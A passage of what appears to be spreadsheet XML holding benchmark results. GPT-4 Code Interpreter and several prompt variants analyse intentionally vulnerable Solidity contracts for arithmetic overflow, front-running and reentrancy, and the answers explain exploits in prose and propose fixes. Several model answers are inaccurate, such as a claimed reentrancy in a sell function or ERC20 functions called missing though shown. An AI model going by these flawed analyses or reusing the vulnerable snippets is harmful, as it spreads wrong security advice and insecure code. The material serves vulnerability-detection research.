  <si>
    <t>1. Yes, there is a vulnerability.
2. Proof of concept of this vulnerability:
   The vulnerability lies in the fact that the Solidity code does not use SafeMath library or similar built-in protection in newer versions of Solidity for arithmetic operations. This could potentially lead to an integer overflow or underflow attack. In this case, if the `_value` is greater than `balances[msg.sender]`, the subtraction operation `balances[msg.sender] -= _value;` could underflow, resulting in a very large balance for `msg.sender` instead of the expected negative or zero balance.
3. The business impact of this vulnerability in one sentence: 
   This function could lead to an integer underflow, potentially allowing a user to transfer more tokens than their balance, resulting in a large unexpected increase in their balance and corresponding decrease in the contract's total supply.
4. The potential solutions of this vulnerability:
   - Use the SafeMath library or similar built-in protection in newer versions of Solidity for arithmetic operations, which includes protection against overflow and underflow.
   - Make sure that the `_value` is not greater than `balances[msg.sender]` before performing the subtraction operation. For example, you could use `require(_value &lt;= balances[msg.sender])` instead of `require(balances[msg.sender] - _value &gt;= 0)`. This would prevent underflow because it checks the condition before the subtraction operation is performed.
Here's the revised code:
```solidity
   function transfer(address _to, uint _value) public returns (bool) {
     require(_value &lt;= balances[msg.sender]);
     balances[msg.sender] -= _value;
     balances[_to] += _value;
     return true;
   }
```
Or, if you are using a version of Solidity that supports it, you can use built-in SafeMath:
```solidity
   function transfer(address _to, uint _value) public returns (bool) {
     balances[msg.sender] = balances[msg.sender].sub(_value);
     balances[_to] = balances[_to].add(_value);
     return true;
   }
```</t>
  </si>
  <si>
    <t>Alright, I will start by examining the provided Solidity code in "token.sol" for any arithmetic vulnerabilities. After analyzing the code, I'll provide the requested format of response.
Based on the provided Solidity code, here's the analysis:
1. Are there any arithmetic vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- In the `transfer` function, there's a risk of underflow in the line `require(balances[msg.sender] - _value &gt;= 0);` because Solidity uses unsigned integers (`uint`). If `_value` is larger than `balances[msg.sender]`, the subtraction will result in a very large number due to underflow.
- Additionally, in the line `balances[_to] += _value;`, there's a risk of overflow. If `_value` is very large and gets added to `balances[_to]`, it could cause an overflow and reset the balance to a smaller number.
3. The business impact of these vulnerabilities in one sentence:
Underflow in the `transfer` function can lead to unauthorized token transfers, and overflow can reset user balances to incorrect values.
4. The potential solutions of this vulnerabilities:
- Use SafeMath library (or similar) to handle arithmetic operations. This library provides functions for arithmetic operations that throw an exception on overflow and underflow.
- Always check for underflows and overflows explicitly before performing subtraction or addition. For instance, before subtracting, check if the number being subtracted is less than or equal to the number from which you are subtracting. Similarly, before adding, check if the resultant value is greater than the original value to ensure no overflow.</t>
  </si>
  <si>
    <t>1. **Yes**, there are arithmetic vulnerabilities.
2. **how this vulnerability can be exploited **:
    - **Underflow**: The line `require(balances[msg.sender] - _value &gt;= 0);` is vulnerable to underflow. In Solidity, `uint` (unsigned integer) types cannot be negative. If `balances[msg.sender]` is less than `_value`, the subtraction will underflow, wrapping around to a very large number, thereby bypassing the `require` check.
    - **Overflow**: The line `balances[_to] += _value;` can lead to an overflow if the added value makes the total exceed the maximum uint value.
3. **The business impact of these vulnerabilities in one sentence**: 
    - Underflow in the `transfer` function leads to unauthorized token transfers.
    - Overflow in the `transfer` function leads to an unintended increase in token balances.
4. **The potential solutions of these vulnerabilities**:
    - For **Underflow**:
        1. Use the SafeMath library for arithmetic operations which provides safe versions of addition, subtraction, multiplication, and division that throw an exception on errors.
        2. Instead of subtracting and then checking, you can directly use: `require(balances[msg.sender] &gt;= _value);`.
    - For **Overflow**:
        1. Again, use the SafeMath library for arithmetic operations.
        2. Ensure checks before addition to see if the resulting value would be greater than the maximum allowable value for uint.</t>
  </si>
  <si>
    <t>dataset/arithmetic/tokensalechallenge.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function buy(uint256 numTokens) public payable {
        require(msg.value == numTokens * PRICE_PER_TOKEN);
        balanceOf[msg.sender] += numTokens;
    }</t>
  </si>
  <si>
    <t>First, I will read and analyze the provided Solidity code to identify potential vulnerabilities.
1. Are there any vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
   - The `buy` function allows users to purchase tokens for `PRICE_PER_TOKEN` per token. However, when a user buys tokens, the contract does not reduce its Ether balance. This means that a user can continue to sell tokens to the contract and drain its Ether balance.
   - There's no mechanism to limit the total number of tokens that can be purchased, which means the balance can go beyond the intended limit.
   - The `isComplete` function checks if the contract balance is less than 1 Ether, but since the `buy` function does not deduct Ether from the contract, this check can be bypassed.
3. The business impact of these vulnerabilities in one sentence:
   - The `buy` function leads to unlimited token minting and can be exploited to drain all Ether from the contract.
4. The potential solutions of these vulnerabilities:
   - Deduct the Ether from the contract's balance when tokens are bought.
   - Implement a maximum token supply or a cap to prevent unlimited token minting.
   - Ensure that the `isComplete` function properly checks the contract's balance after accounting for bought tokens.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? Yes.
2. Explain in details how this vulnerability can be exploited:
   The main vulnerability in this code is associated with the `sell` function. In the function, tokens are subtracted from the sender's balance before the actual transfer is done. This opens up a potential for a re-entrancy attack, where the function could be called recursively in a fallback function of the contract of `msg.sender`, allowing more tokens to be sold than the user initially had.
3. The business impact of this vulnerabilities in one sentence:
   The `sell` function leads to potential loss of tokens due to a re-entrancy attack.
4. The potential solutions of this vulnerabilities:
   The solution to this problem would be to rearrange the order of operations in the `sell` function, making sure to complete all internal state changes before calling external contracts. We can also add a mutex or a re-entrancy guard to prevent recursive calls. Here is a potential fix:
```solidity
bool private _notEntered = true;
function sell(uint256 numTokens) public {
    // Re-entrancy guard
    require(_notEntered, "Reentrant call");
    _notEntered = false;
    require(balanceOf[msg.sender] &gt;= numTokens);
    uint256 amount = numTokens * PRICE_PER_TOKEN;
    balanceOf[msg.sender] -= numTokens;
    // Using call instead of transfer to forward all gas and handle the return value
    (bool success, ) = msg.sender.call{value: amount}("");
    require(success, "Transfer failed");
    _notEntered = true;
}
```
This uses a boolean state variable `_notEntered` to make sure the function cannot be re-entered while it is being executed. The `call` method is used to send ether and it forwards all available gas, unlike `transfer` or `send`. This can prevent out-of-gas errors that could be used in a re-entrancy attack. However, as `call` returns a boolean indicating the success of the operation, we need to handle this return value to make sure the transfer was successful.</t>
  </si>
  <si>
    <t>Alright, let's begin by examining the provided Solidity code. I will read the file and display its contents to better understand the code structure.
The Solidity code represents a contract `TokenSaleChallenge`. Here's a breakdown of its functionality:
1. The contract maintains a mapping called `balanceOf` which tracks the balance of tokens for each address.
2. There's a constant `PRICE_PER_TOKEN` set to 1 ether.
3. The constructor `TokenSaleChallenge` requires that the contract is deployed with an initial 1 ether.
4. The `isComplete()` function checks if the balance of the contract is less than 1 ether.
5. The `buy` function allows a user to buy tokens by sending ether. The required amount is `numTokens * PRICE_PER_TOKEN`.
6. The `sell` function allows a user to sell their tokens and get ether in return.
Next, I will analyze the contract for any arithmetic vulnerabilities.
1. **Are there any arithmetic vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   The vulnerability lies in the `buy` and `sell` functions. Specifically:
   - In the `buy` function:
     ```solidity
     require(msg.value == numTokens * PRICE_PER_TOKEN);
     balanceOf[msg.sender] += numTokens;
     ```
     Here, there is a multiplication between `numTokens` and `PRICE_PER_TOKEN`. If someone provides a large value for `numTokens`, this multiplication can overflow, causing the subsequent `require` condition to pass unexpectedly.
   - In the `sell` function:
     ```solidity
     require(balanceOf[msg.sender] &gt;= numTokens);
     balanceOf[msg.sender] -= numTokens;
     msg.sender.transfer(numTokens * PRICE_PER_TOKEN);
     ```
     Again, there is multiplication between `numTokens` and `PRICE_PER_TOKEN`. If a user has a large balance and tries to sell a large number of tokens, this multiplication can overflow, causing an incorrect amount of ether to be transferred.
3. **The business impact of these vulnerabilities in one sentence:**
   The multiplication overflow in the `buy` and `sell` functions can lead to unexpected ether transfers, compromising the integrity of the token sale.
4. **The potential solutions to these vulnerabilities:**
   - Use SafeMath (or a similar library) for arithmetic operations to prevent overflows.
   - Specifically, replace the multiplication operations with SafeMath's `mul` function and addition operations with SafeMath's `add` function.
   - Ensure that checks are in place to prevent users from buying or selling more tokens than the contract can handle.</t>
  </si>
  <si>
    <t>1. Are there any arithmetic vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The vulnerability lies in the line:
```solidity
require(msg.value == numTokens * PRICE_PER_TOKEN);
```
There is a potential for overflow in the multiplication `numTokens * PRICE_PER_TOKEN`.
3. The business impact of these vulnerabilities in one sentence:
Unchecked multiplication can lead to incorrect ether requirements, allowing unintended token purchases.
4. The potential solutions of these vulnerabilities:
- Use the SafeMath library or equivalent built-in functions (in recent Solidity versions) to handle arithmetic operations safely.
- Specifically, use the `mul` function from SafeMath for multiplication to ensure that overflows are caught and transactions are reverted. The line would look something like:
```solidity
require(msg.value == SafeMath.mul(numTokens, PRICE_PER_TOKEN));
```
- Consider setting a maximum limit on `numTokens` that can be purchased in one transaction to further reduce the risk of overflow.</t>
  </si>
  <si>
    <t xml:space="preserve">    function sell(uint256 numTokens) public {
        require(balanceOf[msg.sender] &gt;= numTokens);
        balanceOf[msg.sender] -= numTokens;
        msg.sender.transfer(numTokens * PRICE_PER_TOKEN);
    }</t>
  </si>
  <si>
    <t>1. Are there any arithmetic vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- The line `msg.sender.transfer(numTokens * PRICE_PER_TOKEN);` may cause an overflow if the product of `numTokens` and `PRICE_PER_TOKEN` exceeds the maximum value of `uint256`.
- The contract does not check whether it has sufficient Ether to fulfill the `transfer` function, potentially causing the contract to become insolvent.
3. The business impact of these vulnerabilities in one sentence:
- Arithmetic overflow in the multiplication can lead to incorrect amounts being transferred, and insufficient contract balance can cause failed transactions or loss of funds.
4. The potential solutions of this vulnerabilities:
- Before multiplying `numTokens` and `PRICE_PER_TOKEN`, check if the multiplication would cause an overflow. This can be done using SafeMath library in Solidity which provides safe arithmetic operations that revert on overflows.
- Before executing the `transfer` method, check if the contract has enough balance to fulfill the request. If not, revert the transaction.</t>
  </si>
  <si>
    <t>file name</t>
  </si>
  <si>
    <t>prompt</t>
  </si>
  <si>
    <t>no.vul</t>
  </si>
  <si>
    <t>cwe</t>
  </si>
  <si>
    <t>cwe fake positive</t>
  </si>
  <si>
    <t>cwe answer</t>
  </si>
  <si>
    <t>call graph +cwe</t>
  </si>
  <si>
    <t>call graph + cwe fake positive</t>
  </si>
  <si>
    <t>call graph + cwe answer</t>
  </si>
  <si>
    <t>location gpt 4 code intpr</t>
  </si>
  <si>
    <t>answer from gpt 4 code intpr</t>
  </si>
  <si>
    <t>dataset/front_running/ERC20.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function transfer(address to, uint256 value) public returns (bool) {
    require(value &lt;= _balances[msg.sender]);
    require(to != address(0));
    _balances[msg.sender] = _balances[msg.sender].sub(value);
    _balances[to] = _balances[to].add(value);
    emit Transfer(msg.sender, to, value);
    return true;
  }</t>
  </si>
  <si>
    <t>Alright, let's begin by reading the contents of the provided Solidity code file named `ERC20.sol`. After reading, I will analyze the code for any vulnerabilities.
The provided code snippet is an implementation of the ERC20 token standard in Solidity. From the initial portion displayed:
1. It starts with a `SafeMath` library, which provides safety checks for arithmetic operations to prevent overflows and underflows.
2. The `ERC20` contract begins and has events for `Transfer` and `Approval`.
3. The `SafeMath` library is imported and its functions are made available for all types.
4. There are mappings for `_balances` and (what seems to be) `_allowed`, but the code cuts off before showing the entirety.
To analyze the code comprehensively, I'll go through the entire code. Let's continue reviewing the rest of the contract to identify any potential vulnerabilities.
From the continuation of the code, we see the following:
1. The `_allowed` mapping keeps track of allowances given by token owners to other addresses.
2. `_totalSupply` keeps track of the total supply of tokens.
3. The `constructor` initializes the token's supply to the sender of the contract creation transaction.
4. `balanceOf` returns the balance of a given address.
5. `allowance` returns the allowance of a spender by the owner.
6. `transfer` allows the sender to transfer tokens to another address.
7. `approve` allows the sender to approve another address to spend a certain amount of their tokens.
8. `transferFrom` allows a spender to transfer tokens from the owner's address to another address, given they have an allowance.
Now, let's analyze the code for vulnerabilities:
### Vulnerabilities:
1. **Old Compiler Version**: The contract uses `pragma solidity ^0.4.24;`. This is an old version of Solidity, and newer versions may have fixed vulnerabilities present in this version.
2. **No `emit` for some events**: While the contract has events declared, it seems that not all state-changing functions emit these events. This can lead to transparency issues.
3. **Reentrancy**: The order of operations in `transfer` and `transferFrom` functions is correct, as it first adjusts the sender's balance, then the recipient's balance. This prevents a reentrancy attack. However, it's always good to use the checks-effects-interactions pattern more explicitly or consider using a reentrancy guard for better clarity.
4. **Missing totalSupply function**: The contract does not seem to have a function to check the `_totalSupply` of the tokens, which is a standard function in ERC20 tokens.
5. **Lack of Access Control**: The `_totalSupply` variable is private, but there are no functions to change it after the contract is deployed. In a more comprehensive ERC20 implementation, there might be minting or burning functions, which would require proper access control mechanisms.
6. **Constructor Keyword**: The contract uses the old `constructor` keyword which is fine for Solidity 0.4.24, but in newer versions, this keyword is used. This isn't a vulnerability per se, but it's something to note if the contract were to be updated.
### Proof of Concept:
1. **Old Compiler Version**: Attackers can exploit known vulnerabilities in older compiler versions.
2. **No `emit` for some events**: Not a direct exploit, but users and dApps may miss out on important transaction information if they rely on logs.
3. **Reentrancy**: Current implementation seems safe, but if the order of operations is altered in future versions, it could become vulnerable.
4. **Missing totalSupply function**: Users and dApps can't verify the total supply of tokens.
5. **Lack of Access Control**: If mint or burn functions were added, without proper access control, anyone might be able to change the token supply.
6. **Constructor Keyword**: If the contract is updated to a newer version of Solidity without updating the constructor, the function might become public, allowing anyone to call it.
#### Conclusion:
**Yes**, there are vulnerabilities and areas of improvement in the provided code.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
The code seems to be a simplified version of an ERC20 token `transfer` function. There are a couple of concerns with the code:
- **Potential for Underflow and Overflow**: The code uses `.sub(value)` and `.add(value)` methods for subtraction and addition, respectively. While the specific implementation of these methods is not provided, if they do not check for underflows and overflows, these operations are vulnerable. An underflow can happen when the value being subtracted is larger than the current balance. An overflow can happen when a value is added to a large balance, and the sum exceeds the maximum representable value.
  - **Underflow**: If `_balances[msg.sender].sub(value)` underflows, it can result in `_balances[msg.sender]` being set to a very large number.
  - **Overflow**: If `_balances[to].add(value)` overflows, it can reset `_balances[to]` to a very small number or even zero.
- **Missing Eventual Consistency Check**: The function does not check the invariant that the total supply of tokens remains consistent before and after the transfer. This is a more subtle vulnerability and isn't directly exploitable but is a good practice for avoiding potential future errors.
To exploit the underflow/overflow vulnerabilities (assuming `.sub` and `.add` do not handle these scenarios), an attacker can:
1. For **Underflow**: Try transferring a value larger than their current balance. This would result in their balance becoming a large number.
2. For **Overflow**: If an address has a balance close to the maximum uint256 value, transferring a token to this address can reset its balance.
Note: The vulnerabilities mentioned assume that the `.sub` and `.add` methods do not handle underflow and overflow. If they do, the function may not have these vulnerabilities.</t>
  </si>
  <si>
    <t>Alright, I will begin by reading the contents of the `ERC20.sol` file to understand its structure and functionality. Once I have done that, I'll analyze it for any potential front-running vulnerabilities.
The provided code seems to be a typical ERC20 token implementation in Solidity. The beginning of the code includes the `SafeMath` library from OpenZeppelin, which provides mathematical operations with safety checks that revert on error. This library helps prevent common issues like integer overflow and underflow.
From the displayed snippet, we have the beginning of the `ERC20` contract, which includes events for token transfers and approvals. There's also the usage of the `SafeMath` library to ensure safe mathematical operations, and mappings to keep track of token balances and allowances.
To properly analyze the code for front-running vulnerabilities, I'll need to review the entire contract, especially the functions that allow for transferring and approving tokens. Let's proceed to analyze the relevant parts of the code.
It seems I forgot to import the `re` module for regular expression operations. I'll correct that and proceed with extracting the relevant sections of the code for analysis.
We have two main sections in the provided code:
1. `SafeMath`: This is a library that provides safe mathematical operations to prevent issues like integer overflow and underflow.
2. `ERC20`: This is the main contract implementation for the ERC20 token.
To check for front-running vulnerabilities, I'll focus on the `ERC20` section, especially the functions that handle transfers and approvals. Let's proceed to analyze the `ERC20` contract in detail.
From the extracted section, we have the `balanceOf` function, which returns the balance of a given account.
To properly assess for front-running vulnerabilities, we'll need to review the key functions related to transferring and approving tokens. These functions typically include:
- `transfer`
- `transferFrom`
- `approve`
I'll proceed to search for these functions within the `ERC20` contract and analyze their implementations.
It appears that the key functions (`transfer`, `transferFrom`, and `approve`) are not present in the displayed section of the `ERC20` contract. This means that either they are missing from the provided code, or they are present later in the contract. 
To ensure a comprehensive analysis, I'll continue to review the remaining parts of the `ERC20` contract to see if these functions are present further down. If they are still not found, we'll need to address the absence of these crucial functions.
The displayed `ERC20` contract section contains the following:
1. Events for token transfers and approvals.
2. Mappings for token balances and allowances.
3. A constructor that initializes the total supply of tokens and assigns them to the contract creator.
4. The `balanceOf` function, which returns the balance of a given account.
Notably, the key functions (`transfer`, `transferFrom`, and `approve`) are not present in this section.
It's unusual for an ERC20 token implementation to not have these key functions. Their absence means that the provided contract doesn't fully implement the ERC20 standard.
To answer your initial question:
1. Are there any front-running vulnerabilities?
   - **No**. The contract doesn't have the key functions where front-running typically occurs.
Given the answer, we can stop the analysis here. However, I'd recommend providing a more complete ERC20 implementation if you intend to use this in a real-world scenario.</t>
  </si>
  <si>
    <t>1. Are there any front-running vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The provided function is a basic `transfer` function for a token. The function checks if the sender has a sufficient balance, checks if the recipient is not a zero address, subtracts the value from the sender's balance, and adds the value to the recipient's balance.
The vulnerability to front-running in this code is that the Ethereum blockchain, like many public blockchains, is susceptible to front-running attacks where a malicious actor can observe a transaction before it is mined and then send their own transaction with a higher gas price to have it mined before the observed transaction.
In the context of this transfer function, the implications are:
- **Order Dependence**: If Alice is trying to make a time-sensitive transfer (e.g., to win a bid, participate in a first-come-first-serve event, etc.), a front-runner (let's call him Bob) can observe her transaction and issue his own transaction with a higher gas fee to make his transaction go through first.
- **Displacement**: Bob can replace Alice's transaction with his own. For instance, if Alice is trying to buy an asset priced in this token, Bob can front-run her transaction with his own transaction buying the asset at the same price, effectively "stealing" the deal from Alice.
It's important to note that this vulnerability is inherent to public blockchains like Ethereum and is not unique to this function. However, to mitigate such attacks, mechanisms like commit-reveal schemes, encrypted transactions, or other layer-2 solutions can be implemented.
In summary, while the code doesn't introduce new front-running vulnerabilities, it is still subject to the general front-running issues present on public blockchains like Ethereum.</t>
  </si>
  <si>
    <t xml:space="preserve">  function approve(address spender, uint256 value) public returns (bool) {
    require(spender != address(0));
    _allowed[msg.sender][spender] = value;
    emit Approval(msg.sender, spender, value);
    return true;
  }</t>
  </si>
  <si>
    <t>1. Are there any front-running vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
When a user submits a valid solution to the `solve` function, the transaction will be broadcast to the Ethereum network but will not be immediately confirmed. This leaves a window of opportunity for an attacker to observe the solution and submit their own transaction with a higher gas price, getting it mined before the original transaction. Thus, the attacker could claim the reward even if they were not the original solver.
3. The business impact of these vulnerabilities in one sentence:
The `solve` function leads to unauthorized users claiming rewards by front-running valid solutions.
4. The potential solutions of these vulnerabilities:
- Implement a commit-reveal scheme: Users first commit to their solution by sending its hash, and after some time, they reveal the actual solution. This prevents attackers from seeing the solution in the initial transaction.
- Use a private or permissioned blockchain for such contests, where transaction ordering can be more controlled.
- Introduce a time delay for withdrawal or have a multi-step verification process, making it harder for attackers to benefit from front-running.
- Limit the reward claiming process to known participants or pre-registered addresses.</t>
  </si>
  <si>
    <t>1. Are there any front running vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The `approve` function, as given, allows an owner of tokens to approve another address (the `spender`) to spend a certain amount of tokens on their behalf. The vulnerability here arises from the way the `_allowed` mapping is directly set to a new value without any checks for previous allowances.
In a scenario where a user intends to change an existing allowance, the user might call `approve` twice: first to set the allowance to `0` and then to set it to the new desired value. Since Ethereum transactions are not processed instantly and miners choose which transactions to include in the next block, a malicious miner or another attacker watching the transaction pool can take advantage of the time delay between these two transactions.
Here's a front-running attack scenario:
1. User A approves User B to spend 10 tokens.
2. Later, User A wants to change this to allow User B to spend only 5 tokens. So, User A first sends a transaction to set the allowance to `0`.
3. Before the transaction is mined, User B sees this transaction in the pool and quickly sends a transaction to spend the 10 tokens.
4. A malicious miner or another attacker can order the transactions in such a way that User B's spend transaction is mined before User A's reset transaction. This allows User B to spend the original 10 tokens, and then the allowance is set to `0`.
5. Now, when User A's second transaction (to set the allowance to 5 tokens) is processed, User B is again approved to spend 5 tokens, making the total tokens User B can spend 15 instead of the intended 5.
To mitigate this, the ERC-20 standard suggests using an `increaseAllowance` and `decreaseAllowance` approach or ensuring that the allowance is `0` before setting a new value.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The `approve` function, as presented, is a typical implementation used in many ERC-20 token contracts for allowing a specified `spender` to spend a given `value` of tokens on behalf of the message sender (`msg.sender`). However, there is a well-known race condition vulnerability associated with the direct usage of the `approve` function in certain scenarios. This vulnerability is termed the "ERC-20 approve race condition."
The race condition arises when a token holder tries to change the allowance of a spender that has already been approved to spend a certain number of tokens. If the spender monitors transactions and sees a decreased allowance transaction before it's confirmed, the spender can quickly send a transfer transaction to utilize the full initial allowance and then again use the newly set allowance once the decreased allowance transaction is confirmed.
Here's a step-by-step explanation of the vulnerability:
1. Assume `spender` has an allowance of 100 tokens set by the `owner`.
2. `Owner` decides to decrease the allowance to 50 tokens and sends an `approve` transaction.
3. Before the `approve` transaction gets mined, `spender` notices the transaction in the transaction pool.
4. `Spender` quickly sends a `transferFrom` transaction to utilize the 100 tokens allowance.
5. If `spender's` transaction gets mined before the `approve` transaction, `spender` will have used the 100 tokens allowance.
6. After that, the `approve` transaction gets mined, setting the allowance to 50 tokens.
7. Now, `spender` can use an additional 50 tokens, effectively transferring 150 tokens in total, even though the `owner` intended to decrease the allowance to 50 tokens.
To mitigate this issue, the best practice is to set the allowance to 0 before setting it to a new value. This can be done by requiring the user to call `approve(spender, 0)` before calling `approve(spender, newValue)`.
The current function doesn't implement this mitigation, making it vulnerable to the ERC-20 approve race condition.</t>
  </si>
  <si>
    <t>dataset/front_running/FindThisHash.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function solve(string solution) public {
        require(hash == sha3(solution));
        msg.sender.transfer(1000 ether);
    }</t>
  </si>
  <si>
    <t>Alright, let me first read through the provided Solidity code. Once I have an understanding of its content, I'll address the vulnerabilities as per your format.
Based on the provided Solidity code:
1. **Are there any vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :**
   - The code uses `sha3`, which is an alias for `keccak256` in older Solidity versions. However, this is not explicitly mentioned, which can lead to confusion. 
   - The function `solve` allows any user to call it and, if successful in finding the pre-image of the hash, to transfer 1000 ether. There's no check to ensure that the contract has sufficient balance or to prevent reentrancy attacks.
3. **The business impact of these vulnerabilities in one sentence:** 
   The `solve` function leads to potential loss of more ether than intended and is vulnerable to reentrancy attacks.
4. **The potential solutions to these vulnerabilities:**
   - Replace `sha3` with `keccak256` for clarity.
   - Before the `msg.sender.transfer(1000 ether);` line, add a check to ensure that the contract has sufficient balance to transfer.
   - Implement a reentrancy guard mechanism to prevent recursive calls to the `solve` function. This can be achieved by using a state variable to lock the contract when a transfer is in progress and only allow it to be unlocked after the transfer is complete.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
   - The use of `sha3` for hashing is outdated in Solidity. The correct function to use in newer versions of Solidity is `keccak256`.
   - The function does not check if the contract has sufficient balance before transferring the ether. 
   - The function does not have any access control mechanism, allowing anyone to call it if they have a correct solution hash.
3. The business impact of these vulnerabilities in one sentence:
   - Incorrect hashing function and lack of balance and access checks can lead to unexpected ether transfers and potential theft.
4. The potential solutions of these vulnerabilities:
   - Replace `sha3` with `keccak256` for accurate hashing in newer versions of Solidity.
   - Before transferring ether, check if the contract has enough balance using `address(this).balance &gt;= 1000 ether`.
   - Implement an access control mechanism or ensure that only the intended parties can call this function, perhaps using a modifier or a whitelist approach.</t>
  </si>
  <si>
    <t>Let's start by examining the uploaded Solidity code to understand its functionality and check for any front-running vulnerabilities.
Based on the provided Solidity code for the `FindThisHash` contract, here's the analysis:
**1. Are there any front-running vulnerabilities?**
Yes.
**2. how this vulnerability can be exploited :** 
The `solve` function checks if the input string `solution` produces the target hash. If it does, the function transfers 1000 ether to the caller (`msg.sender`). An attacker can monitor the Ethereum transaction pool for any transactions targeting this function. When they spot a valid solution, they can create a similar transaction with a higher gas price, hoping to get their transaction mined before the original solver's transaction, thus stealing the reward.
**3. The business impact of these vulnerabilities in one sentence:**
The `solve` function leads to potential theft of the 1000 ether reward by front-runners.
**4. The potential solutions to this vulnerability:**
- Introduce a commit-reveal scheme where solvers first commit their solutions in one transaction and reveal them in a subsequent transaction after some blocks. This can prevent front-runners from knowing the correct solution immediately.
- Implement a queuing system where the first person to submit a solution has a certain number of blocks to complete the transaction before the next solver can claim the reward.
- Use off-chain solutions like Zero-Knowledge Proofs to verify solutions without revealing them on-chain.
- Limit the number of times an address can call the `solve` function within a specific time frame to prevent rapid front-running attempts.
Note: Among these solutions, the commit-reveal scheme is a commonly employed method to prevent front-running in Ethereum contracts.</t>
  </si>
  <si>
    <t>dataset/front_running/eth_tx_order_dependence_minimal.sol</t>
  </si>
  <si>
    <t xml:space="preserve">function claimReward(uint256 submission) {
        require (!claimed);
        require(submission &lt; 10);
        msg.sender.transfer(reward);
        claimed = true;
    }"
</t>
  </si>
  <si>
    <t>First, I'll begin by examining the provided Solidity code in the file `eth_tx_order_dependence_minimal.sol`. After reading through the code, I'll provide an analysis. Let's take a look.
Here's a breakdown of the provided Solidity code:
```solidity
pragma solidity ^0.4.16;
contract EthTxOrderDependenceMinimal {
    address public owner;
    bool public claimed;
    uint public reward;
    function EthTxOrderDependenceMinimal() public {
        owner = msg.sender;
    }
    function setReward() public payable {
        require (!claimed);
        require(msg.sender == owner);
        owner.transfer(reward);
        reward = msg.value;
    }
    function claimReward(uint256 submission) {
        require (!claimed);
        require(submission &lt; 10);
        msg.sender.transfer(reward);
        claimed = true;
    }
}
```
### Analysis:
1. **Are there any vulnerabilities?**
   Answer: Yes.
2. **how this vulnerability can be exploited :**
    a. **Reentrancy Vulnerability**: The `setReward` function contains a potential reentrancy attack. The line `owner.transfer(reward);` sends ether before the state (i.e., `reward = msg.value;`) is updated. If the `owner` address is a malicious contract that calls `setReward` again during the transfer, it can drain the contract.
    b. **Tx.origin Dependence Vulnerability**: The code doesn't use `tx.origin`, so this vulnerability isn't present.
    c. **Uninitialized State Variable Vulnerability**: The `claimed` and `reward` state variables have default values (`false` for `claimed` and `0` for `reward`), so there's no vulnerability in this regard.
    d. **Transaction Order Dependence (TOD) Vulnerability**: The function `claimReward` could potentially be vulnerable to a transaction order dependence attack. If two users send transactions to claim the reward at roughly the same time, only the first transaction that gets mined will succeed, while the other will fail. This can be exploited by miners who can reorder transactions to their advantage.
    e. **Gas Limit Vulnerability**: Not observed in this contract.
    f. **Underflow/Overflow Vulnerability**: Not observed in this contract. The function `claimReward` ensures that the `submission` is less than 10, so there's no potential for underflow or overflow in this context.
In summary, the main vulnerabilities observed in this contract are related to reentrancy and transaction order dependence.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
The provided function `claimReward` contains a potential vulnerability related to the order of operations. Specifically, the reward is transferred to `msg.sender` before the `claimed` state is set to `true`. This can lead to a reentrancy attack, where a malicious contract can recursively call the `claimReward` function before the `claimed` variable is set to true, thereby draining more than the intended reward.
To exploit this, an attacker could create a malicious contract with a fallback function that calls `claimReward` upon receiving Ether. When the attacker calls `claimReward` for the first time, it will trigger the malicious fallback function, which will again call `claimReward`, allowing the attacker to potentially withdraw more rewards than intended. 
The safe way to write this function is to change the state (`claimed = true;`) before transferring the Ether. This way, even if a reentrancy attack is attempted, the `require(!claimed);` check will prevent any further withdrawals.</t>
  </si>
  <si>
    <t>Alright, I will first read the content of the Ethereum smart contract you provided and then analyze it for any front-running vulnerabilities.
The contract `EthTxOrderDependenceMinimal` has the following key details:
1. State Variables:
   - `owner` (address): The address of the contract owner.
   - `claimed` (bool): A boolean flag indicating whether the reward has been claimed.
   - `reward` (uint): The amount of reward set by the owner.
2. Functions:
   - `EthTxOrderDependenceMinimal()`: The constructor sets the `owner` to the address that deploys the contract.
   - `setReward()`: This function allows the owner to set the reward. The owner can call this function and send ether along with it to set a new reward. Before doing so, the previous reward, if any, is sent back to the owner.
   - `claimReward(uint256 submission)`: This function allows anyone to claim the reward if they provide a `submission` value less than 10. Once claimed, the `claimed` flag is set to `true`.
Analysis:
1. Front-running vulnerabilities: 
   **Yes**.
2. how this vulnerability can be exploited :
   The vulnerability exists in the `claimReward` function. An attacker observing the transaction pool can see when someone is trying to claim the reward. Since the condition to claim the reward is straightforward (just providing a `submission` value less than 10), an attacker can front-run the original claimer's transaction with their own transaction that claims the reward. They can do this by setting a higher gas price to ensure their transaction gets mined before the original claimer's transaction. Once the attacker's transaction is mined and the reward is claimed, the `claimed` flag is set to `true`, making the original claimer's transaction fail when it is eventually processed.
To prevent this, you may consider adding additional conditions for claiming the reward or using commit-reveal schemes, which make front-running more challenging.</t>
  </si>
  <si>
    <t>"1. Are there any front running vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The function `claimReward` transfers a reward to the caller if the reward has not been previously claimed (`!claimed`) and if the `submission` is less than 10. This function is vulnerable to front running attacks because a malicious actor who observes a transaction calling this function can issue their own transaction with a higher gas price. By doing so, they can ensure their transaction is mined before the original transaction, allowing them to claim the reward first. 
In a real-world scenario, imagine a legitimate user sees an opportunity and sends a transaction to claim the reward. A front runner, upon seeing this on the mempool, can quickly send another transaction with a higher gas fee to claim the reward for themselves before the original transaction gets confirmed."</t>
  </si>
  <si>
    <t>dataset/front_running/odds_and_evens.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function play(uint number) payable{
